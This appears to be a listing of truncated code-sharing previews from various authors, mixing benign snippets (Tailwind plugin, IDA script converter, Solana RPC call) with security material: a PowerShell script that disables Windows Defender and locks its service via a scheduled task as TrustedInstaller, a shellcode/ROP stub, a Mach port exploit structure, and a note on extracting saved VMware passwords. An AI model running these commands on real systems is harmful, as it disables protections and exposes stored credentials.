andshrew

Retrieving VMware Workstation VM encryption passwords saved in the the Windows Credential Manager

When creating an encrypted VM, VMware Workstation gives you the option to remember the password. It does this by storing the password in the Windows Credential Manager.

VMware does not provide a way to retrieve this stored password, but it can be accessed via the Win32 CredReadW API function.

There are a number of PowerShell projects including PowerShell Credential Manager which provide access to this API, but in testing I found they were unable to correctly display the VMware password.

This PowerShell example has been tested using Windows PowerShell (v5.1) and PowerShell (v7) using VMwa

jakeajames

#include <stdlib.h>
#include <stdio.h>
#include <pthread/pthread.h>
#include <mach/mach.h>

struct ool_msg  {
    mach_msg_header_t hdr;
    mach_msg_body_t body;
    mach_msg_ool_ports_descriptor_t ool_ports[];
};

levicook

curl http://api.mainnet-beta.solana.com -X POST -H "Content-Type: application/json" -d '{
  "jsonrpc": "2.0",
  "id": 1,
  "method": "getProgramAccounts",
  "params": [
    "cndyAnrLdpjq1Ssp1z8xxDsB8dxe7u4HL5Nxi2K5WXZ",
    {
      "encoding": "jsonParsed",
      "filters": [ ]
    }

NtRaiseHardError

#include <Windows.h>

// example shellcode
// make sure to have 8 reserved bytes for 64-bit ret
// gadget to rop into the actual shellcode
CHAR shellcode[] = {
    // 8 bytes here for jmp loop gadget 
    0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA,
    // actual shellcode starts here
    0xEB, 0xFE, 0x01, 0x23, 0x45, 0x67, 0x89, 0xAA,

tyranid

$cmdline = '/C sc.exe config windefend start= disabled && sc.exe sdset windefend D:(D;;GA;;;WD)(D;;GA;;;OW)'

$a = New-ScheduledTaskAction -Execute "cmd.exe" -Argument $cmdline
Register-ScheduledTask -TaskName 'TestTask' -Action $a

$svc = New-Object -ComObject 'Schedule.Service'
$svc.Connect()

$user = 'NT SERVICE\TrustedInstaller'
$folder = $svc.GetFolder('\')

Merott

This is a simple Tailwind plugin to expose all of Tailwind's colors, including any custom ones, as custom css properties on the :root element.

There are a couple of main reasons this is helpful:

• You can reference all of Tailwind's colors—including any custom ones you define—from handwritten CSS code.
• You can define all of your colors within the Tailwind configuration, and access the final values programmatically, which isn't possible if you did it the other way around: referencing custom CSS variables (defined in CSS code) from your Tailwind config.

See the Tailwind Plugins for more info on plugins.

WanderingGlitch

#!/usr/bin/env python

'''
This has some pretty gross hacks in it
But gives a general idea what it is like to write a 2to3 fixer

Basically run like this:
    ida2to3.py /path/to/your/script /path/to/idc_bc695.py

Give it a once over to make sure it didn't break too much, then:

hfiref0x

typedef interface IEditionUpgradeManager IEditionUpgradeManager;

typedef struct IEditionUpgradeManagerVtbl {

    BEGIN_INTERFACE

    HRESULT(STDMETHODCALLTYPE *QueryInterface)(
        __RPC__in IEditionUpgradeManager * This,
        __RPC__in REFIID riid,

darconeous

Tesla Key Card Protocol

Researched by Robert Quattlebaum darco@deepdarc.com.

Last updated 2020-02-03.

gamozolabs

/// Generate a hash using the values in Zmm0 and return Zmm0
///
/// Clobbers Zmm1!!!
fn hash_zmm0(outasm: &mut falkasm::AsmStream, conststore: &mut ConstStore)
{
    let kmask = Operand::KmaskRegister(KmaskType::Merge(KmaskReg::K1));

    let thirt = Membc(Some(R10), None, conststore.add_const(13)
        .unwind("Out of room for constant storage") as i64 * 4);
    let sevent = Membc(Some(R10), None, conststore.add_const(17)